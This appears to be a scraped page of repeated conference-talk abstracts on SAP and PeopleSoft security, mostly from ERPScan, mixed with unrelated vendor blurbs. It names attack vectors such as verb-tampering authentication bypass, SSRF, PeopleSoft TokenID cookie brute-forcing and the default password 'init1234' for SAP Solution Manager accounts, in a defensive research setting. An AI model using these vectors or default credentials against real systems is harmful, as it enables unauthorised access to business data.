SAP is the most popular business application with more than one hundred eighty thousand installations all over the world. But people spend enormous amounts of money to install it and then forget about security. In ERP systems, all business processes are performed, all critical information is stored like finances, HR, clients. Not to care about the security of this data is not very sensible.
The presentation provides examples of simple and advanced attacks along with ways to avoid them.
The document discusses security issues related to SAP solutions and introduces ERPScan as an innovative product to help address these issues. It notes that over 2500 security notes have been released for SAP, highlighting growing threats. ERPScan provides integrated assessment of application platform security, ABAP code security, and business logic security. It can monitor SAP servers for vulnerabilities, misconfigurations, critical authorizations, and compliance with standards. The system aims to help automate security checks and reduce costs associated with SAP security problems.
SAP is the most popular business application with more than two hundred forty thousand installations all over the world. But people spend enormous amounts of money to install it and then forget about security. However, in ERP systems, all business processes are performed, all critical information is stored like finances, HR, clients. Not to care about the security of this data is not very sensible.
SAP NetWeaver Development Infrastructure is a complex item. It combines the characteristics and advantages of local development environments with a server-based development landscape. All this stuff centrally provides opportunities to support the software, implement new features, manage lifecycle of a product, etc. So, the main aim is to control deployment of components in the system landscape in a standardized manner.
The key component in DI scheme is Software Deployment Manager (SDM). It is directly related to the production systems, that is why it is so critical.
The presentation describes special features of SDM and provides several SDM attack scenarios along with the ways to prevent them.
Business breakdown vulnerabilities in ERP via ICS and ICS via ERPERPScan
This document discusses vulnerabilities in connecting ERP and ICS systems. It notes that while ERP, ICS, and other business systems need to be connected to share information, these connections can be exploited by attackers to infiltrate corporate networks. The document outlines several ways that vulnerabilities in ERP systems, misconfigurations, unnecessary privileges, and system interconnectivity can be leveraged to access sensitive business data or disrupt operations. It emphasizes that securing these connections and monitoring for security issues is critical for business security and continuity.
If I want a perfect cyberweapon, I'll target ERPERPScan
ERP Systems are widely used in Oil and Gas, Manufacturing, Logistics, Financials
Nuclear, Retail, Telecommunication and other industries. All mission-critical data are stored in ERP Systems, so attacks against them may result in Espionage, Sabotage and Fraud.
The presentation gives examples of real and potential attacks and describes important details of ERP Security.
Alexander Polyakov, CTO of ERPScan, presented this talk at RSA Conference Europe 2013.
SSRF vs. Business-critical applications. Part 2. New vectors and connect-back...ERPScan
This document discusses server-side request forgery (SSRF) attacks and their history. SSRF attacks allow an attacker to exploit vulnerabilities in web applications to initiate requests from the server to other internal or external systems. The document outlines the basics of SSRF attacks and categorizes different types, providing examples of how SSRF can be used in proxy and connect-back attacks. It emphasizes the risk of SSRF attacks against critical enterprise applications given the sensitive data they contain.
If I want a perfect cyberweapon, I'll target ERP - second editionERPScan
This document discusses security risks associated with enterprise resource planning (ERP) systems like SAP. It begins by noting how critical ERP systems are for large companies and the vast number of customers that major ERP vendors have. It then provides examples of security risks like espionage, sabotage and fraud that can occur in ERP modules like materials management. Specific vulnerabilities that could allow manipulating materials prices or blocking materials posting are described. The document emphasizes that while examples focus on SAP, the risks apply to all major ERP systems.
This document discusses security threats related to SAP systems. It notes that SAP is one of the most widely used business applications, with over 250,000 customers worldwide. However, SAP systems also contain a wealth of sensitive information and are targets for espionage, sabotage, and fraud. The document outlines how a single compromised SAP system could provide access to critical corporate data and processes. It emphasizes that many SAP instances have not been updated in years and contain thousands of known vulnerabilities. Additionally, SAP systems are highly interconnected both within and between companies, allowing threats to spread widely. Strong security is needed to protect SAP environments and the organizations that rely on them.
SAP Mobile infrastructure consists of multiple systems such as SAP Mobile Platform (formerly Sybase Unwired Platform) also SAP Afaria MDM solution, Sybase SQL Anywhere Database, and hundreds of SAP's mobile applications. They even have their own store for mobile apps that can be developed by third parties. This talk highlights how one can hack SAP Mobile.
In this popular platform, we have discovered a lot of typical vulnerabilities - XSS, XXE, hardcoded static encryption keys, and vulnerabilities that are specific to this platform - logic vulnerabilities and privilege escalations. As a result, after compromising the SAP Mobile platform, we demonstrated how to get access to compromised mobile phones.
The document discusses security issues related to SAP solutions and introduces ERPScan as an innovative product to help address these issues. It notes that over 2500 security notes have been released for SAP, highlighting growing threats. ERPScan provides integrated assessment of application platform security, ABAP code security, and business logic security. It can monitor SAP servers for vulnerabilities, misconfigurations, critical authorizations, and compliance with standards. The system aims to help automate security checks and reduce costs associated with SAP security problems.
SAP is the most popular business application with more than two hundred forty thousand installations all over the world. But people spend enormous amounts of money to install it and then forget about security. However, in ERP systems, all business processes are performed, all critical information is stored like finances, HR, clients. Not to care about the security of this data is not very sensible.
SAP NetWeaver Development Infrastructure is a complex item. It combines the characteristics and advantages of local development environments with a server-based development landscape. All this stuff centrally provides opportunities to support the software, implement new features, manage lifecycle of a product, etc. So, the main aim is to control deployment of components in the system landscape in a standardized manner.
The key component in DI scheme is Software Deployment Manager (SDM). It is directly related to the production systems, that is why it is so critical.
The presentation describes special features of SDM and provides several SDM attack scenarios along with the ways to prevent them.
Business breakdown vulnerabilities in ERP via ICS and ICS via ERPERPScan
This document discusses vulnerabilities in connecting ERP and ICS systems. It notes that while ERP, ICS, and other business systems need to be connected to share information, these connections can be exploited by attackers to infiltrate corporate networks. The document outlines several ways that vulnerabilities in ERP systems, misconfigurations, unnecessary privileges, and system interconnectivity can be leveraged to access sensitive business data or disrupt operations. It emphasizes that securing these connections and monitoring for security issues is critical for business security and continuity.
If I want a perfect cyberweapon, I'll target ERPERPScan
ERP Systems are widely used in Oil and Gas, Manufacturing, Logistics, Financials
Nuclear, Retail, Telecommunication and other industries. All mission-critical data are stored in ERP Systems, so attacks against them may result in Espionage, Sabotage and Fraud.
The presentation gives examples of real and potential attacks and describes important details of ERP Security.
Alexander Polyakov, CTO of ERPScan, presented this talk at RSA Conference Europe 2013.
SSRF vs. Business-critical applications. Part 2. New vectors and connect-back...ERPScan
This document discusses server-side request forgery (SSRF) attacks and their history. SSRF attacks allow an attacker to exploit vulnerabilities in web applications to initiate requests from the server to other internal or external systems. The document outlines the basics of SSRF attacks and categorizes different types, providing examples of how SSRF can be used in proxy and connect-back attacks. It emphasizes the risk of SSRF attacks against critical enterprise applications given the sensitive data they contain.
If I want a perfect cyberweapon, I'll target ERP - second editionERPScan
This document discusses security risks associated with enterprise resource planning (ERP) systems like SAP. It begins by noting how critical ERP systems are for large companies and the vast number of customers that major ERP vendors have. It then provides examples of security risks like espionage, sabotage and fraud that can occur in ERP modules like materials management. Specific vulnerabilities that could allow manipulating materials prices or blocking materials posting are described. The document emphasizes that while examples focus on SAP, the risks apply to all major ERP systems.
This document discusses security threats related to SAP systems. It notes that SAP is one of the most widely used business applications, with over 250,000 customers worldwide. However, SAP systems also contain a wealth of sensitive information and are targets for espionage, sabotage, and fraud. The document outlines how a single compromised SAP system could provide access to critical corporate data and processes. It emphasizes that many SAP instances have not been updated in years and contain thousands of known vulnerabilities. Additionally, SAP systems are highly interconnected both within and between companies, allowing threats to spread widely. Strong security is needed to protect SAP environments and the organizations that rely on them.
SAP Mobile infrastructure consists of multiple systems such as SAP Mobile Platform (formerly Sybase Unwired Platform) also SAP Afaria MDM solution, Sybase SQL Anywhere Database, and hundreds of SAP's mobile applications. They even have their own store for mobile apps that can be developed by third parties. This talk highlights how one can hack SAP Mobile.
In this popular platform, we have discovered a lot of typical vulnerabilities - XSS, XXE, hardcoded static encryption keys, and vulnerabilities that are specific to this platform - logic vulnerabilities and privilege escalations. As a result, after compromising the SAP Mobile platform, we demonstrated how to get access to compromised mobile phones.
SAP security landscape. How to protect(hack) your(their) big businessERPScan
This document discusses security risks related to SAP applications. It describes ERPScan, a company that provides SAP security monitoring. It then discusses two specific risks: 1) Credit card data theft, where attackers could access encrypted credit card data stored in SAP tables. 2) Competitive intelligence risks, where attackers could access bidding information in SAP SRM to unfairly underbid competitors. The document emphasizes that SAP systems are complex, customized, and rarely updated, making them vulnerable to attacks.
The presentation describes 5 steps you should take to secure your SAP. There are:
1. Pentesting and Audit
2. Compliance
3. Internal security and SOD
4. ABAP Source code review
5. Forensics
This document discusses security vulnerabilities in SAP systems. It notes that many SAP systems have non-web services exposed that could allow remote access. It also details how passwords are sometimes stored insecurely in SAP shortcuts, log files, and database tables, allowing attackers to gain access to systems and steal sensitive data. The document recommends steps companies can take to prevent such vulnerabilities, like patching systems, not storing passwords in shortcuts, and using more secure authentication methods.
The presentation provides the list of top 10 SAP vulnerabilities (2011-2012) as well as ways of defense.
1. Authentication Bypass via Verb tampering
2. Authentication Bypass via the Invoker servlet
3. Buffer overflow in ABAP Kernel
4. Code execution via TH_GREP
5. MMC read SESSIONID
6. Remote portscan
7. Encryption in SAPGUI
8. BAPI XSS/SMBRELAY
9. XML Blowup DOS
10. GUI Scripting DOS
Oracle PeopleSoft applications are under attacks (Hack in Paris)ERPScan
Oracle is the second largest vendor on the ERP market, and its PeopleSoft is used in more than 7000 companies including about 50 % of Fortune 100. PeopleSoft applications are widespread over the world with more than 72% of customers in the USA.
On May 28, Alexey Tyurin, Head of Oracle Security Department at ERPScan, presented this talk at the Hack In The Box security conference.
The presentation describes
Practical SAP pentesting workshop (NullCon Goa)ERPScan
All business processes are generally contained in ERP systems. Any information an attacker might want is stored in a company’s ERP. This information can include financial, customer or public relations, intellectual property, personally identifiable information and more. And SAP is the most popular business application vendor with more than 250000 customers worldwide.
The workshop conducted by Alexander Polyakov, CTO of ERPScan, at NullCon Goa Conference is a practical SAP pentesting guide.
Practical SAP pentesting (B-Sides San Paulo)ERPScan
All business processes are generally contained in ERP systems. Any information an attacker might want is stored in a company’s ERP. This information can include financial, customer or public relations, intellectual property, personally identifiable information and more. And SAP is the most popular business application vendor with more than 250000 customers worldwide.
The workshop conducted by Alexander Polyakov, CTO of ERPScan, at B-Sides Conference 2014 (San Paulo) is a practical SAP pentesting guide.
The document discusses security issues related to SAP systems and portals. It notes that while SAP is widely used, security vulnerabilities are common due to lack of logging and exposure of services. The document emphasizes that SAP portals deserve attention as they provide a common entry point for attackers and link to other critical systems. Proper monitoring of portals and exposed services is needed to detect attacks and unauthorized access.
The presentation describes 5 steps you should take to secure your SAP. There are:
1. Pentesting and Audit
2. Compliance
3. Internal security and SOD
4. ABAP Source code review
5. Forensics
Forgotten world - Corporate Business Application SystemsERPScan
This document discusses penetration testing of enterprise resource planning (ERP) systems. It notes that ERP systems are complex, mission-critical applications that contain sensitive business and financial data. Penetration testing ERP systems requires in-depth knowledge of business processes, custom implementations, and various operating systems, databases, and hardware platforms used. The goal is to identify risks like data exposure or business disruption, not just gaining shell access. Exploits also need to be carefully adapted to avoid unintended impacts to the system.
Business applications like ERP, CRM, SRM, and others are one of the major topics in the field of computer security as these applications store business data and any vulnerabilities in these applications can cause a significant monetary and reputational loss or even stoppage of business.
Nonetheless, people still do not pay much attention to the technical side of SAP security.
As for SAP, we saw different vulnerabilities at all levels (architecture, software vulnerabilities and implementation).
Oracle PeopleSoft applications are under attack (HITB AMS)ERPScan
Oracle is the second largest vendor on the ERP market, and its PeopleSoft is used in more than 7000 companies including about 50 % of Fortune 100. PeopleSoft applications are widespread over the world with more than 72% of customers in the USA.
On May 28, Alexey Tyurin, Head of Oracle Security Department at ERPScan, presented this talk at the Hack In The Box security conference.
The presentation describes PeopleSoft Architecture and provides several internal and external attack vectors. Let’s look at the most dangerous one. PeopleSoft systems are often accessible from the Internet. And some parts of the system have to be available before registration, for example, job application forms or “Forgot your password?” forms. For this purpose, there is a special user with minimal rights in PeopleSoft systems. When you enter, the system automatically authenticates you as this user. It is an opportunity to perform a privilege escalation attack by bruteforcing the authentication cookie called TokenID. TokenID is generated based on SHA1 hashing algorithm, and according to the latest information, 8-characters alpha-numeric password can be decrypted within one day on latest GPUs that cost about $ 500.
EAS-SEC: Framework for securing business applicationsERPScan
For a quite long time, ERP Security was only the synonym of segregation of duties. But nowadays this situation has changed. There are 3 areas of Business Application Security such as SOD, Custom Code security and Application platform security. SAP customers are now aware of problems with SAP installations, but they still don’t know, where should they start to solve them.
The aim of EAS-SEC (http://eas-sec.org/) is to aware people about enterprise application security problems and create guidelines and tools for enterprise application security assessment.
5 real ways to destroy business by breaking SAP applicationsERPScan
This document discusses security risks related to SAP applications. It describes 5 ways that business applications can be broken into, including espionage, sabotage, and fraud. Specific risks discussed include theft of credit card data from SAP's SD module, and compromise of competitive bidding information from the SRM module. The document advocates for security measures like configuration checks, access controls and code scanning to help defend against attacks.
This document discusses securing enterprise business applications. It notes that major companies rely on applications like SAP, Oracle, and Microsoft Dynamics for critical functions. However, these applications are often vulnerable to attacks like espionage, sabotage, and fraud due to issues like outdated versions, poor patching processes, and internet accessibility. The document argues that securing these widely implemented but vulnerable applications is essential for protecting companies and their sensitive data, operations, and financials.
The latest changes to SAP cybersecurity landscapeERPScan
The document discusses cybersecurity risks related to SAP systems. It describes two main risks: 1) Credit card data theft, where a hacker could access tables storing unencrypted credit card data in the SD module and steal the data. 2) Competitive intelligence theft through the SRM module, where a competitor could access bidding information to undercut prices unfairly. The document advocates for stronger configuration controls, access management, and patching to help mitigate these risks.
Many SAP systems are connected to the Internet, and exposing sensitive services beyond Web applications. Furthermore, the internal network is usually not properly segmented.
The interest in SAP security is growing exponentially, and not only among whitehats. Unfortunately, SAP users still pay little attention to SAP security.
Obtained findings were presented at RSA APAC Conference 2013.
This research focuses on statistics of SAP Vulnerabilities, threats from the Internet, known incidents and future trends.
SAP systems provides Business Intelligence platforms, which can be a promising target for business espionage. Business executives make their strategic decisions and report on their performance based on the information provided by their Business Intelligence platforms. Therefore, how valuable could that information be for the company’s largest competitor? Even further, what if the consolidated, decision-making data has been compromised?
What if an attacker has poisoned the system and changed the key indicators? SAP BusinessObjects is used by thousands of companies world-wide and serves as the gold standard platform for Business Intelligence.
In this presentation we will discuss our recent research on SAP BusinessObjects security. Specifically, through several live demos, we will present techniques attackers may use to target and compromise an SAP BusinessObjects deployment and what you need to do in order to mitigate those risks.
The document discusses security issues related to SAP applications. It outlines 13 ways that SAP systems can be exploited to damage businesses. It then provides recommendations on how to assess security risks, prioritize updates, and comply with regulations to better protect SAP systems. The document also notes that ERPScan has discovered over 3,000 vulnerabilities in SAP products since 2007 and discusses the business risks of espionage, sabotage, and fraud if SAP systems are compromised.
Top 10 most interesting vulnerabilities and attacks in SAPERPScan
An increasing number of SAP Security Notes and talks on SAP Security proves that it becomes a really hot topic nowadays. However, SAP systems attacks are still believed to be available only for insiders. The reality is not so good. There are about 5000 systems including dispatchers, message servers, SapHostcontrols, Web-services on the internet.
Top 10 vulnerabilities 2011-2012 are:
1. Authentication Bypass via Verb tampering
2. Authentication Bypass via the Invoker servlet
3. Buffer overflow in ABAP Kernel
4. Code execution via TH_GREP
5. MMC read SESSIONID
6. Remote portscan
7. Encryption in SAPGUI
8. BAPI XSS/SMBRELAY
9. XML Blowup DOS
10. GUI Scripting DOS
The presentation provides a detailed description of these attacks, its potential business risks and the way to prevent them.
SAP security landscape. How to protect(hack) your(their) big businessERPScan
This document discusses security risks related to SAP applications. It describes ERPScan, a company that provides SAP security monitoring. It then discusses two specific risks: 1) Credit card data theft, where attackers could access encrypted credit card data stored in SAP tables. 2) Competitive intelligence risks, where attackers could access bidding information in SAP SRM to unfairly underbid competitors. The document emphasizes that SAP systems are complex, customized, and rarely updated, making them vulnerable to attacks.
The presentation describes 5 steps you should take to secure your SAP. There are:
1. Pentesting and Audit
2. Compliance
3. Internal security and SOD
4. ABAP Source code review
5. Forensics
This document discusses security vulnerabilities in SAP systems. It notes that many SAP systems have non-web services exposed that could allow remote access. It also details how passwords are sometimes stored insecurely in SAP shortcuts, log files, and database tables, allowing attackers to gain access to systems and steal sensitive data. The document recommends steps companies can take to prevent such vulnerabilities, like patching systems, not storing passwords in shortcuts, and using more secure authentication methods.
The presentation provides the list of top 10 SAP vulnerabilities (2011-2012) as well as ways of defense.
1. Authentication Bypass via Verb tampering
2. Authentication Bypass via the Invoker servlet
3. Buffer overflow in ABAP Kernel
4. Code execution via TH_GREP
5. MMC read SESSIONID
6. Remote portscan
7. Encryption in SAPGUI
8. BAPI XSS/SMBRELAY
9. XML Blowup DOS
10. GUI Scripting DOS
Oracle PeopleSoft applications are under attacks (Hack in Paris)ERPScan
Oracle is the second largest vendor on the ERP market, and its PeopleSoft is used in more than 7000 companies including about 50 % of Fortune 100. PeopleSoft applications are widespread over the world with more than 72% of customers in the USA.
On May 28, Alexey Tyurin, Head of Oracle Security Department at ERPScan, presented this talk at the Hack In The Box security conference.
The presentation describes
Practical SAP pentesting workshop (NullCon Goa)ERPScan
All business processes are generally contained in ERP systems. Any information an attacker might want is stored in a company’s ERP. This information can include financial, customer or public relations, intellectual property, personally identifiable information and more. And SAP is the most popular business application vendor with more than 250000 customers worldwide.
The workshop conducted by Alexander Polyakov, CTO of ERPScan, at NullCon Goa Conference is a practical SAP pentesting guide.
Practical SAP pentesting (B-Sides San Paulo)ERPScan
All business processes are generally contained in ERP systems. Any information an attacker might want is stored in a company’s ERP. This information can include financial, customer or public relations, intellectual property, personally identifiable information and more. And SAP is the most popular business application vendor with more than 250000 customers worldwide.
The workshop conducted by Alexander Polyakov, CTO of ERPScan, at B-Sides Conference 2014 (San Paulo) is a practical SAP pentesting guide.
The document discusses security issues related to SAP systems and portals. It notes that while SAP is widely used, security vulnerabilities are common due to lack of logging and exposure of services. The document emphasizes that SAP portals deserve attention as they provide a common entry point for attackers and link to other critical systems. Proper monitoring of portals and exposed services is needed to detect attacks and unauthorized access.
The presentation describes 5 steps you should take to secure your SAP. There are:
1. Pentesting and Audit
2. Compliance
3. Internal security and SOD
4. ABAP Source code review
5. Forensics
Forgotten world - Corporate Business Application SystemsERPScan
This document discusses penetration testing of enterprise resource planning (ERP) systems. It notes that ERP systems are complex, mission-critical applications that contain sensitive business and financial data. Penetration testing ERP systems requires in-depth knowledge of business processes, custom implementations, and various operating systems, databases, and hardware platforms used. The goal is to identify risks like data exposure or business disruption, not just gaining shell access. Exploits also need to be carefully adapted to avoid unintended impacts to the system.
Business applications like ERP, CRM, SRM, and others are one of the major topics in the field of computer security as these applications store business data and any vulnerabilities in these applications can cause a significant monetary and reputational loss or even stoppage of business.
Nonetheless, people still do not pay much attention to the technical side of SAP security.
As for SAP, we saw different vulnerabilities at all levels (architecture, software vulnerabilities and implementation).
Oracle PeopleSoft applications are under attack (HITB AMS)ERPScan
Oracle is the second largest vendor on the ERP market, and its PeopleSoft is used in more than 7000 companies including about 50 % of Fortune 100. PeopleSoft applications are widespread over the world with more than 72% of customers in the USA.
On May 28, Alexey Tyurin, Head of Oracle Security Department at ERPScan, presented this talk at the Hack In The Box security conference.
The presentation describes PeopleSoft Architecture and provides several internal and external attack vectors. Let’s look at the most dangerous one. PeopleSoft systems are often accessible from the Internet. And some parts of the system have to be available before registration, for example, job application forms or “Forgot your password?” forms. For this purpose, there is a special user with minimal rights in PeopleSoft systems. When you enter, the system automatically authenticates you as this user. It is an opportunity to perform a privilege escalation attack by bruteforcing the authentication cookie called TokenID. TokenID is generated based on SHA1 hashing algorithm, and according to the latest information, 8-characters alpha-numeric password can be decrypted within one day on latest GPUs that cost about $ 500.
EAS-SEC: Framework for securing business applicationsERPScan
For a quite long time, ERP Security was only the synonym of segregation of duties. But nowadays this situation has changed. There are 3 areas of Business Application Security such as SOD, Custom Code security and Application platform security. SAP customers are now aware of problems with SAP installations, but they still don’t know, where should they start to solve them.
The aim of EAS-SEC (http://eas-sec.org/) is to aware people about enterprise application security problems and create guidelines and tools for enterprise application security assessment.
5 real ways to destroy business by breaking SAP applicationsERPScan
This document discusses security risks related to SAP applications. It describes 5 ways that business applications can be broken into, including espionage, sabotage, and fraud. Specific risks discussed include theft of credit card data from SAP's SD module, and compromise of competitive bidding information from the SRM module. The document advocates for security measures like configuration checks, access controls and code scanning to help defend against attacks.
This document discusses securing enterprise business applications. It notes that major companies rely on applications like SAP, Oracle, and Microsoft Dynamics for critical functions. However, these applications are often vulnerable to attacks like espionage, sabotage, and fraud due to issues like outdated versions, poor patching processes, and internet accessibility. The document argues that securing these widely implemented but vulnerable applications is essential for protecting companies and their sensitive data, operations, and financials.
The latest changes to SAP cybersecurity landscapeERPScan
The document discusses cybersecurity risks related to SAP systems. It describes two main risks: 1) Credit card data theft, where a hacker could access tables storing unencrypted credit card data in the SD module and steal the data. 2) Competitive intelligence theft through the SRM module, where a competitor could access bidding information to undercut prices unfairly. The document advocates for stronger configuration controls, access management, and patching to help mitigate these risks.
Many SAP systems are connected to the Internet, and exposing sensitive services beyond Web applications. Furthermore, the internal network is usually not properly segmented.
The interest in SAP security is growing exponentially, and not only among whitehats. Unfortunately, SAP users still pay little attention to SAP security.
Obtained findings were presented at RSA APAC Conference 2013.
This research focuses on statistics of SAP Vulnerabilities, threats from the Internet, known incidents and future trends.
SAP systems provides Business Intelligence platforms, which can be a promising target for business espionage. Business executives make their strategic decisions and report on their performance based on the information provided by their Business Intelligence platforms. Therefore, how valuable could that information be for the company’s largest competitor? Even further, what if the consolidated, decision-making data has been compromised?
What if an attacker has poisoned the system and changed the key indicators? SAP BusinessObjects is used by thousands of companies world-wide and serves as the gold standard platform for Business Intelligence.
In this presentation we will discuss our recent research on SAP BusinessObjects security. Specifically, through several live demos, we will present techniques attackers may use to target and compromise an SAP BusinessObjects deployment and what you need to do in order to mitigate those risks.
The document discusses security issues related to SAP applications. It outlines 13 ways that SAP systems can be exploited to damage businesses. It then provides recommendations on how to assess security risks, prioritize updates, and comply with regulations to better protect SAP systems. The document also notes that ERPScan has discovered over 3,000 vulnerabilities in SAP products since 2007 and discusses the business risks of espionage, sabotage, and fraud if SAP systems are compromised.
Top 10 most interesting vulnerabilities and attacks in SAPERPScan
An increasing number of SAP Security Notes and talks on SAP Security proves that it becomes a really hot topic nowadays. However, SAP systems attacks are still believed to be available only for insiders. The reality is not so good. There are about 5000 systems including dispatchers, message servers, SapHostcontrols, Web-services on the internet.
Top 10 vulnerabilities 2011-2012 are:
1. Authentication Bypass via Verb tampering
2. Authentication Bypass via the Invoker servlet
3. Buffer overflow in ABAP Kernel
4. Code execution via TH_GREP
5. MMC read SESSIONID
6. Remote portscan
7. Encryption in SAPGUI
8. BAPI XSS/SMBRELAY
9. XML Blowup DOS
10. GUI Scripting DOS
The presentation provides a detailed description of these attacks, its potential business risks and the way to prevent them.
Architecture vulnerabilities in SAP platformsERPScan
SAP security becomes a hot theme nowadays. Attacks on SAP can put a business at risk of Espionage, Sabotage and Fraud.
The presentation covers the following architecture and unusual issues:
Authentication Bypass
1. Verb tampering
2. Invoker servlet
Encryption
3. Storage – SAPGUI
4. Authentication – P4
5. Transfer – RFC, Diag
SSRF
6. Port Scan
7. Command execution
8. Security bypass
Also, the presentation gives advice for developers and describes future trends in SAP Security area.
A crushing blow at the heart of SAP’s J2EE Engine. ERPScan
Automation of business processes like ERP, PLM, CRM, SRM based on ABAP.
There are the following integration, collaboration and management based on J2EE engine:
- SAP Portal
- SAP PI
- SAP XI
- SAP Mobile Infrastructure
- SAP Solution Manager.
Administrators, developers, pentesters, and researchers mostly focus on ABAP stack. Hackers know about it, so they will find easier ways to control your business.
The presentation describes SAP J2EE Platform Architecture and provides examples of internal and external attacks and ways of its prevention.
Injecting evil code in your SAP J2EE systems. Security of SAP Software Deploy...ERPScan
SAP is the most popular business application with more than two hundred forty thousand installations all over the world. But people spend enormous amounts of money to install it and then forget about security. However, in ERP systems, all business processes are performed, all critical information is stored like finances, HR, clients. Not to care about the security of this data is not very sensible.
SAP NetWeaver Development Infrastructure is a complex item. It combines the characteristics and advantages of local development environments with a server-based development landscape. All this stuff centrally provides opportunities to support the software, implement new features, manage lifecycle of a product, etc. So, the main aim is to control deployment of components in the system landscape in a standardized manner.
The key component in DI scheme is Software Deployment Manager (SDM). It is directly related to the production systems, that is why it is so critical.
The presentation describes special features of SDM and provides several SDM attack scenarios along with the ways to prevent them.
Practical pentesting of ERPs and business applicationsERPScan
All business processes are generally contained in ERP systems. Any information an attacker might want is stored in the company’s ERP. This information can include financial, customer or public relations, intellectual property, personally identifiable information and more. Industrial espionage, sabotage and fraud or insider embezzlement may be very effective if targeted at the victim’s ERP system and cause significant damage to the business.
The presentation describes the specificity of ERP pentesting and focuses on SAP NetWeaver JAVA and Oracle PeopleSoft pentesting.
Default accounts are commonly exploited to gain unauthorized access to SAP systems. The presentation identifies several new default accounts in SAP Solution Manager with the password "init1234" that can be used to retrieve passwords, execute operating system commands, and fully compromise associated SAP systems. It provides examples of how these accounts can be exploited and advises customers to use available tools to detect and remediate exposed default accounts.
ciso-platform-annual-summit-2013-New Framework for ERP SecurityPriyanka Aash
The document discusses various guidelines for assessing security in SAP systems. It describes the EAS-SEC standard developed by ERPScan, which includes 33 critical checks across 9 areas. This is proposed as a first step for rapid security assessments. The document also mentions other guidelines from SAP, ISACA, and DSAG that can be used for more comprehensive assessments. It highlights some limitations of existing guidelines and the need to develop standards that cover all applications and aspects of security, including source code reviews. The author proposes expanding the EAS-SEC framework to address these gaps.
The interest in SAP security has been growing exponentially, and not only among whitehats. SAP invests money and resources in security, provides guidelines, and arranges conferences, but, unfortunately, SAP users still pay little attention to SAP security
There are most important takeaways for CISOs to provide SAP Security for Enterprises. The presentation destroys the SAP Security myths, includes statistics obtained by ERPScan Research Group, and future trends in SAP Security.
Onapsis SAP Forensics: Detecting White-Collar Cyber Crime with SAP ForensicsOnapsis Inc.
The largest organizations in the world rely on SAP platforms to run their critical processes and keep their business crown jewels: financial information, customers data, intellectual property, credit cards, human resources salaries, sensitive materials, suppliers and more. Everything is there – and attackers know it.
Now, the big question arises: Has your SAP system ever been hacked? Is it compromised today? If your answer is “no”, are you sure? Do you know what to look for? Unfortunately, most organizations do not have this knowledge today, which only empowers the bad guys.
For several years at Onapsis we have been researching on how cyber-criminals might be able to break into ERP systems, in order to help organizations better protect themselves. This has enabled us to gain a unique expertise on which are the most critical attack vectors and what kind of traces they leave (and don’t) over the victim SAP platforms.
This presentation will cover how to do a forensic analysis of an SAP system, looking for traces of a security breach. Learn where fingerprints may have been left, understand which are the available system tools that may help you and which are their limitations. Watch several live demos of security breaches and find out how you may be able to detect that they took place, helping you assess the business impact and track down the attacker.
MySQL Day Paris 2018 - MySQL & GDPR; Privacy and Security requirementsOlivier DASINI
MySQL Enterprise Transparent Data Encryption (TDE) protects your critical data by enabling data-at-rest encryption in the database. It protects the privacy of your information, prevents data breaches and helps meet regulatory requirements including the Payment Card Industry Data Security Standard (PCI DSS), Health Insurance Portability and Accountability Act (HIPAA) and numerous others.
MySQL Enterprise Audit provides an easy to use, policy-based auditing solution that helps organizations implement stronger security controls and satisfy regulatory compliance.
As more sensitive data is collected, stored and used online, database auditing becomes an essential component of any security strategy. To guard against the misuse of information, popular compliance regulations including HIPAA, Sarbanes-Oxley, and the PCI Data Security Standard require organizations to track access to information.
MySQL Enterprise Firewall guards against cyber security threats by providing real-time protection against database specific attacks. Any application that has user-supplied input, such as login and personal information fields is at risk. Database attacks don't just come from applications. Data breaches can come from many sources including SQL virus attacks or from employee misuse. Successful attacks can quickly steal millions of customer records containing personal information, credit card, financial, healthcare or other valuable data.
MySQL Enterprise Masking and De-identification provides an easy to use, built-in database solution to help organizations protect sensitive data from unauthorized uses by hiding and replacing real values with substitutes.
MySQL Enterprise Edition provides ready to use external authentication modules to easily integrate existing security infrastructures, including Linux Pluggable Authentication Modules (PAM) and Windows Active Directory.
CONFidence 2014: Dimitriy Chastuhin: All your sap p@$$w0яd z belong to usPROIDEA
Nowadays, everyone knows about the great importance of SAP systems and the critical data processed by them. Large companies install SAP Security Notes regularly so as not to repeat the mistake of Nvidia. One bug is not enough anymore to get access to all corporate SAP systems. Pentesters frequently find themselves in a situation where the OS of an SAP server has been compromised successfully, but they have not got an access to the ERP system. In addition, it is rather common to have an unprivileged account, which give them access to the encrypted password, but not to the whole system. Sometimes they even try to break into other systems with help of the passwords, which users usually use in the systems they’ve already broken, but they can’t, because they need them to be decrypted first. Where do we find the treasured password to access the financial transactions and revenues of NASDAQ monsters?
Where and how does SAP store user passwords? Are all passwords stored as hashes, or can attackers find passwords in plaintext?
This talk reviews the many places where SAP stores critical credentials, such as usernames and passwords, and, which is more interesting, the way it stores them. Methods of retrieving them will be described, and decryption utilities will be presented.
SAP GUI shortcuts, RFC connections, SAP Security Storage, logs, traces, Database links, SAP HANA Storage, you name it – all varieties of SAP modules will be discussed in this talk.
Accelerate2022-Solving the SAP Security Gap through Application-aware Network...PeterSmetny1
This document discusses securing SAP systems and provides an overview of Fortinet's SAP security solutions. It notes that network security is foundational but SAP security is also important as SAP admins do not secure the network and network admins do not secure SAP. It then outlines Fortinet's SAP security blueprint and describes how the company provides network security, web security, secure access solutions, and a SAP connector to help secure SAP deployments. The document concludes by providing contact information for Fortinet's SAP security team.
SAP Forensics Detecting White Collar Cyber-crimeOnapsis Inc.
The largest organizations in the world rely on SAP platforms to run their critical processes and keep their business crown jewels: financial information, customers data, intellectual property, credit cards, human resources salaries, sensitive materials, suppliers and more. Everything is there – and attackers know it.
Now, the big question arises: Has your SAP system ever been hacked? Is it compromised today? If your answer is “no”, are you sure? Do you know what to look for? Unfortunately, most organizations do not have this knowledge today, which only empowers the bad guys.
For several years at Onapsis we have been researching on how cyber-criminals might be able to break into ERP systems, in order to help organizations better protect themselves. This has enabled us to gain a unique expertise on which are the most critical attack vectors and what kind of traces they leave (and don’t) over the victim SAP platforms.
This presentation will cover how to do a forensic analysis of an SAP system, looking for traces of a security breach. Learn where fingerprints may have been left, understand which are the available system tools that may help you and which are their limitations. Watch several live demos of security breaches and find out how you may be able to detect that they took place, helping you assess the business impact and track down the attacker.
Best Practices for a Complete Postgres Enterprise Architecture SetupEDB
The document discusses best practices for setting up a complete PostgreSQL enterprise architecture, including components for OLTP infrastructure, high availability, disaster recovery, data integration, monitoring and management, and security. It also provides an overview of EnterpriseDB's integrated PostgreSQL product portfolio and tools that can be used to implement an enterprise-grade PostgreSQL setup. The presentation recommends using a reference architecture approach to accelerate implementation, lower costs, enhance performance, and reduce risk.
